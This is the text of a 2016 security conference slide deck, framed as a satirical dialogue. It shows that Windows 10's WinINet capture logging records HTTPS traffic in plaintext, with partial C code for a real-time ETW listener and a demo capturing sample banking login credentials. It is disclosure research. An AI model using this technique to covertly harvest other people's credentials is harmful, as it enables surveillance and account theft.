INTERCEPT HTTPS TRAFFIC

ON WINDOWS10

AVTOKYO 2016Oct. 22th 2016

ABOUT ME

• Soya Aoyama (AO)

•Security researcher who LOVES FRONTALE and DRINK

• Work at Fujitsu System Integration Laboratories Ltd. (Since 2014- )

• https://www.facebook.com/soya.aoyama.3

2

INTRODUCTION

This slide includes some fictions,

and has partially no relation to actual persons, entities etc.

3

CONVERSATION BETWEEN A TWO (1)

4

Hi Bill, I heard that a great function was

added to Windows10, correct?Well, yes, Tim

The function to expose attackers’

behaviorsWow.

What’s the function in particular?

Capture the full WinINet trafficIt can be checked through event viewer.

HOW TO CHECK

1. Open event viewer and select below“Applications and Services Logs”

“Microsoft”

“Windows”

“WinINet (Microsoft-Windows-WinINet-Capture)”

“Capture/Analytic”

2. Click “Enable Log” and Enable logs

3. Start Edge and access WEB services

5

THE RESULT

Details of Event viewer

6

CONVERSATION BETWEEN A TWO (2)

7

Where are the captured data stored?

It’s in the Payload in the Details

It’s like cypher text and incomprehensible,

isn’t it?

A-a-I c-c-can find by eyes

STRING CONVERSION

1. Copy the contents of Payload

2. Paste intohttp://singoro.net/16henkan/

8

485454502F312E3120323030204F4B0D0A43616368652D436F6E74726F6C3A206E6F2D63616368652C206E6F2D73746F72652C206D7573742D726576616C69646174650D0A507261676D613A206E6F2D63616368650D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A457870697265733A202D310D0A5365727665723A204D6963726F736F66742D4949532F382E350D0A533A20434831415050455830393436360D0A4163636573732D436F6E74726F6C2D416C6C6F772D4F726967696E3A202A0D0A4163636573732D436F6E74726F6C2D416C6C6F772D486561646572733A20436F6E74656E742D547970650D0A4163636573732D436F6E74726F6C2D416C6C6F772D4D6574686F64733A20504F53542C204745542C204F5054494F4E532C20484541440D0A4163636573732D436F6E74726F6C2D4D61782D4167653A2032313630300D0A446174653A205468752C2030382053657020323031362030353A34323A313820474D540D0A436F6E74656E742D4C656E6774683A20300D0A0D0A

HTTP/1.1 200 OKCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheContent-Type: text/plainExpires: -1Server: Microsoft-IIS/8.5S: CH1APPEX09466Access-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeAccess-Control-Allow-Methods: POST, GET, OPTIONS, HEADAccess-Control-Max-Age: 21600Date: Thu, 08 Sep 2016 05:42:18 GMTContent-Length: 0

CONVERSATION BETWEEN A TWO (3)

9

It seems really captured… but no time to

convert per packet, right？No worries.It‘s designed to be captured from

ApplicationsWell done, Bill. You never miss a trick.

How do you realize？

I use Event Tracing for Windows (ETW)

SOURCE PROGRAM

10

Application to capture WinINet contents in real time.#include <Windows.h>#include <Evntrace.h>#include <stdio.h>#include <wchar.h>#include <tdh.h>

TRACEHANDLE controllerHandle = INVALID_PROCESSTRACE_HANDLE;LPWSTR sessionName = L"Microsoft-Windows-WinInet-Capture";HANDLE event = NULL;

EXTERN_C __declspec(selectany) const GUID PROVIDERID_Microsoft_Windows_WinInet_Capture = { 0xa70ff94f, 0x570b, 0x4979,{ 0xba,0x5c, 0xe5, 0x9c, 0x9f, 0xea, 0xb6, 0x1b } };

// イベントコールバックvoid WINAPI EventRecordCallback(PEVENT_RECORD EventRecord) {

if (TRUE == IsEqualGUID(PROVIDERID_Microsoft_Windows_WinInet_Capture, EventRecord->EventHeader.ProviderId)) {char *UserData = (char *)malloc(EventRecord->UserDataLength);memset(UserData, 0, EventRecord->UserDataLength);memcpy(UserData, (PBYTE)EventRecord->UserData + 0x10, EventRecord->UserDataLength - 0x10);printf("%s\n", UserData);free(UserData);

}}

// コンシューマ用スレッドDWORD WINAPI ThreadProc(LPVOID lpParamater) {

// セッションオープンEVENT_TRACE_LOGFILE logFile = {};logFile.LogFileName = NULL;logFile.LoggerName = sessionName;logFile.ProcessTraceMode = PROCESS_TRACE_MODE_EVENT_RECORD | PROCESS_TRACE_MODE_REAL_TIME;logFile.EventRecordCallback = &EventRecordCallback;

EVENT TRACING FOR WINDOWS

Ｍicrosoft bloghttps://blogs.msdn.microsoft.com/jpwdkblog/2011/12/27/event-tracing-for-windows-etw/

Aetos382’s bloghttp://tech.blog.aerie.jp/archive/category/ETW

11

CONVERSATION BETWEEN A TWO (4)

12

o-o-only requires this much of code…

Super EASY, isn’t it?

I know you apply this to all PCs inside, huh?

What？

USERS WHO DON’T KNOW ANYTHING

13

Access an internet banking site

THE RESULT

_PAGEID=AA011&_SENDTS=1467876489534&_TRANID=AA011_001&_SUBINDEX=-1&_TARGET=MUFGpop_syokai&_FRAMID=&_LUID=LUID&_WINID=root&_TARGETWINID=&DEVICEPRINT=version%253D3%252E4%252E1%252E0%255F1%2526pm%255Ffpua%253Dmozilla%252F5%252E0%2520%2528windows%2520nt%252010%252E0%2529%2520applewebkit%252F537%252E36%2520%2528khtml%252C%2520like%2520gecko%2529%2520chrome%252F46%252E0%252E2486%252E0%2520safari%252F537%252E36%2520edge%252F13%252E10586%257C5%252E0%2520%2528Windows%2520NT%252010%252E0%2529%2520AppleWebKit%252F537%252E36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%252F46%252E0%252E2486%252E0%2520Safari%252F537%252E36%2520Edge%252F13%252E10586%257CWin32%2526pm%255Ffpsc%253D24%257C1729%257C864%257C824%2526pm%255Ffpsw%253D%2526pm%255Ffptz%253D9%2526pm%255Ffpln%253Dlang%253Dja%252DJP%257Csyslang%253D%257Cuserlang%253D%2526pm%255Ffpjv%253D1%2526pm%255Ffpco%253D1%2526pm%255Ffpasw%253Dflash%257C%2526pm%255Ffpan%253DNetscape%2526pm%255Ffpacn%253DMozilla%2526pm%255Ffpol%253Dtrue%2526pm%255Ffposp%253D%2526pm%255Ffpup%253D%2526pm%255Ffpsaw%253D1729%2526pm%255Ffpspd%253D24%2526pm%255Ffpsbd%253D0%2526pm%255Ffpsdx%253D96%2526pm%255Ffpsdy%253D96%2526pm%255Ffpslx%253D96%2526pm%255Ffpsly%253D96%2526pm%255Ffpsfse%253Dtrue%2526pm%255Ffpsui%253D%2526pm%255Fos%253DWindows%2526pm%255Fbrmjv%253D46%2526pm%255Fbr%253DChrome%2526pm%255Finpt%253D%2526pm%255Fexpt%253D&KEIYAKU_NO=12345678&PASSWORD=87654321

HTTP/1.1 200 OK

Date: Thu, 07 Jul 2016 07:28:47 GMT

Server: Apache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Cache-Control: no-cache

Pragma: no-cache

Content-length: 11661

Content-Type: text/html;charset=Shift_JIS

Connection: close

14

KEIYAKU_NO=12345678PASSWORD=87654321

15

Amazing.

No encryption or anything…

Yeah.

Even Internal fraud monitoring can be

done.

What about security?

No risks to be abused by attackers?

No worries!! Data Capture is impossible without

administrative privileges.

CONVERSATION BETWEEN A TWO (5)

CONCLUSION

Vulnerabilities that allows privilege elevation…

are found even this year!!

CVE-2016-0099 、CVE-2016-3371

16

Insanely Great!!